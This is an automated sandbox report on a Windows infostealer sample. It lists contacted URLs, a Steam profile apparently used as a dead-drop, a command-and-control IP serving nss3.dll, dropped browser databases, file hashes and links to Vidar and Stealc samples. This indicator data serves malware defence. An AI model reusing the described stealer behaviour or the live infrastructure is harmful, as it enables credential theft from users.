                    https://steamcommunity.com/discussions/MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://store.steampowered.com/stats/MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&ampMSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://store.steampowered.com/steam_refunds/MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://78.47.123.174/nss3.dllaMSBuild.exe, 00000001.00000002.2045233748.00000000010A0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gifMSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?vMSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallFIIDBK.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchAFBFHD.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pMSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://steamcommunity.com/workshop/MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://steamcommunity.com/profiles/76561199689717899/badgesMSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://store.steampowered.com/legal/MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    http://www.sqlite.org/copyright.html.MSBuild.exe, 00000001.00000002.2048308496.000000001336C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2054500004.000000001930D000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=englMSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://steamcommunity.com/profiles/76561199689717899/inventory/MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://sectigo.com/CPS0SecuriteInfo.com.Win32.Malware-gen.198.6512.exefalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&amp;l=enMSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgMSBuild.exe, 00000001.00000002.2045233748.0000000001066000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2045233748.000000000117E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2045233748.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, ECGIII.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoAFBFHD.1.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&amp;l=english&amMSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=Hpc3R3GOITMSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&amp;l=engliMSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    http://upx.sf.netAmcache.hve.4.drfalse
                    • URL Reputation: safe
                    unknown
                    https://store.steampowered.com/76561199689717899[1].htm.1.drfalse
                    • URL Reputation: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IP | Domain | Country | ASN | ASN Name | Malicious
                    23.199.218.33 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | true
                    78.47.123.174 | unknown | Germany | 24940 | HETZNER-ASDE | false
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1447066
                    Start date and time:2024-05-24 10:26:11 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 8m 57s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:12
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@9/32@1/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 96%
                    • Number of executed functions: 132
                    • Number of non-executed functions: 208
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 40.126.32.138, 40.126.32.72, 40.126.32.133, 40.126.32.136, 40.126.32.134, 20.190.160.22, 40.126.32.68, 20.190.160.20, 93.184.221.240, 192.229.221.95, 20.189.173.22, 40.127.169.103, 52.165.164.15, 20.114.59.183, 20.3.187.198
                    • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ctldl.windowsupdate.com.delivery.microsoft.com, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, wu.ec.azureedge.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, wu.azureedge.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, blobcollector.events.data.trafficmanager.net, glb.cws.prod.dcat.dsp.trafficmanager.net, hlb.apr-52dd2-0.edgecastdns.net, sls.update.microsoft.com, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    Time | Type | Description
                    04:26:59 | API Interceptor | 1x Sleep call for process: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe modified
                    04:27:09 | API Interceptor | 1x Sleep call for process: MSBuild.exe modified
                    04:27:13 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    23.199.218.33http://steamcommunici.com/profiles/76567410475250301Get hashmaliciousUnknownBrowse
                      https://mobile-sides-vertical-2.xv2.us/Get hashmaliciousUnknownBrowse
                        https://steam.poweredcommunityart.com/artwork/?id=8513444218Get hashmaliciousUnknownBrowse
                          file.exeGet hashmaliciousCryptOne, VidarBrowse
                            78.47.123.174BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                              file.exeGet hashmaliciousVidarBrowse
                                file.exeGet hashmaliciousVidarBrowse
                                  SecuriteInfo.com.Trojan.PWS.Steam.37259.28451.11337.exeGet hashmaliciousCryptOne, VidarBrowse
                                    a6lzHWp4pa.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                      file.exeGet hashmaliciousVidarBrowse
                                        file.exeGet hashmaliciousVidarBrowse
                                          file.exeGet hashmaliciousVidarBrowse
                                            file.exeGet hashmaliciousVidarBrowse
                                              file.exeGet hashmaliciousVidarBrowse
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                steamcommunity.comBI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                • 104.102.42.29
                                                file.exeGet hashmaliciousVidarBrowse
                                                • 104.102.42.29
                                                https://steamcommunnittly.com/gift/activation/feor37565hFh6dseGet hashmaliciousUnknownBrowse
                                                • 104.102.42.29
                                                dfzesJIgdr.exeGet hashmaliciousRedLine, VidarBrowse
                                                • 23.197.127.21
                                                http://steamcommunici.com/profiles/76567410475250301Get hashmaliciousUnknownBrowse
                                                • 92.122.104.90
                                                file.exeGet hashmaliciousVidarBrowse
                                                • 23.197.127.21
                                                SecuriteInfo.com.Trojan.PWS.Steam.37259.28451.11337.exeGet hashmaliciousCryptOne, VidarBrowse
                                                • 23.197.127.21
                                                a6lzHWp4pa.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                • 23.195.238.96
                                                file.exeGet hashmaliciousVidarBrowse
                                                • 23.197.127.21
                                                file.exeGet hashmaliciousVidarBrowse
                                                • 23.197.127.21
                                                fp2e7a.wpc.phicdn.netSecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                • 192.229.221.95
                                                http://18.158.249.75Get hashmaliciousUnknownBrowse
                                                • 192.229.221.95
                                                BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                • 192.229.221.95
                                                https://perspectivefunnel.co/664fc385b6e1a200142f71ee/664fc45e205ea60014803d49/Get hashmaliciousUnknownBrowse
                                                • 192.229.221.95
                                                https://pub-a2527e0fc1774b399011ecd14755d452.r2.dev/0nlinedoc.htmlGet hashmaliciousHTMLPhisherBrowse
                                                • 192.229.221.95
                                                run.jsGet hashmaliciousUnknownBrowse
                                                • 192.229.221.95
                                                http://qyt8pi.krestologs.comGet hashmaliciousUnknownBrowse
                                                • 192.229.221.95
                                                SecuriteInfo.com.PUA.Tool.RemoteControl.18.25736.20264.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                • 192.229.221.95
                                                SecuriteInfo.com.PUA.Tool.RemoteControl.18.25736.20264.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                • 192.229.221.95
                                                http://birchflarechurch.comGet hashmaliciousUnknownBrowse
                                                • 192.229.221.95
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                AKAMAI-ASUSBI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                • 104.102.42.29
                                                Job Description (LM HR Division II).pdf .scr.exeGet hashmaliciousUnknownBrowse
                                                • 23.47.168.24
                                                https://deref-mail.com/mail/client/j_iGygdK9BI/dereferrer/?redirectUrl=Get hashmaliciousUnknownBrowse
                                                • 23.212.88.20
| Match | Associated Sample Name / URL | Detection | Threat Name |
| --- | --- | --- | --- |
| C:\ProgramData\AFCBAEBAEBFH\freebl3.dll | BI6oo9z4In.exe | malicious | CryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer |
| | file.exe | malicious | Vidar |
| | btCbrSS2Je.exe | malicious | Mars Stealer, Stealc, Vidar |
| | 7urUz64I0Y.exe | malicious | Mars Stealer, Stealc, Vidar |
| | file.exe | malicious | Vidar |
| | SecuriteInfo.com.Trojan.PWS.Steam.37259.28451.11337.exe | malicious | CryptOne, Vidar |
| | a6lzHWp4pa.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar |
| | file.exe | malicious | Vidar |
| | file.exe | malicious | Vidar |
| | file.exe | malicious | Vidar |
| C:\ProgramData\AFCBAEBAEBFH\mozglue.dll | BI6oo9z4In.exe | malicious | CryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer |
| | file.exe | malicious | Vidar |
| | btCbrSS2Je.exe | malicious | Mars Stealer, Stealc, Vidar |
| | 7urUz64I0Y.exe | malicious | Mars Stealer, Stealc, Vidar |
| | file.exe | malicious | Vidar |
| | SecuriteInfo.com.Trojan.PWS.Steam.37259.28451.11337.exe | malicious | CryptOne, Vidar |
| | a6lzHWp4pa.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar |
| | file.exe | malicious | Vidar |
| | file.exe | malicious | Vidar |
| | file.exe | malicious | Vidar |
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                        Category:dropped
                                                                                        Size (bytes):106496
                                                                                        Entropy (8bit):1.1358696453229276
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                        Malicious:false
                                                                                        Reputation:high, very likely benign file
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):5242880
                                                                                        Entropy (8bit):0.037963276276857943
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                        MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                        SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                        SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                        SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                        Malicious:false
                                                                                        Reputation:high, very likely benign file
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):32768
                                                                                        Entropy (8bit):0.017262956703125623
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                        Malicious:false
                                                                                        Reputation:high, very likely benign file
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):9571
                                                                                        Entropy (8bit):5.536643647658967
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                        MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                        SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                        SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                        SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                        Malicious:false
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                        Category:dropped
                                                                                        Size (bytes):159744
                                                                                        Entropy (8bit):0.7873599747470391
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                        Malicious:false
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):114688
                                                                                        Entropy (8bit):0.9746603542602881
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                        Malicious:false
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                        Category:dropped
                                                                                        Size (bytes):40960
                                                                                        Entropy (8bit):0.8553638852307782
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                        Malicious:false
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                        Category:dropped
                                                                                        Size (bytes):28672
                                                                                        Entropy (8bit):2.5793180405395284
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                        Malicious:false
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                        Category:dropped
                                                                                        Size (bytes):98304
                                                                                        Entropy (8bit):0.08235737944063153
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                        Malicious:false
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):32768
                                                                                        Entropy (8bit):0.017262956703125623
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                        Malicious:false
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):126976
                                                                                        Entropy (8bit):0.47147045728725767
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                        Malicious:false
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):685392
                                                                                        Entropy (8bit):6.872871740790978
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                        MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                        SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                        SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                        SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: BI6oo9z4In.exe, Detection: malicious
                                                                                        • Filename: file.exe, Detection: malicious
                                                                                        • Filename: btCbrSS2Je.exe, Detection: malicious
                                                                                        • Filename: 7urUz64I0Y.exe, Detection: malicious
                                                                                        • Filename: file.exe, Detection: malicious
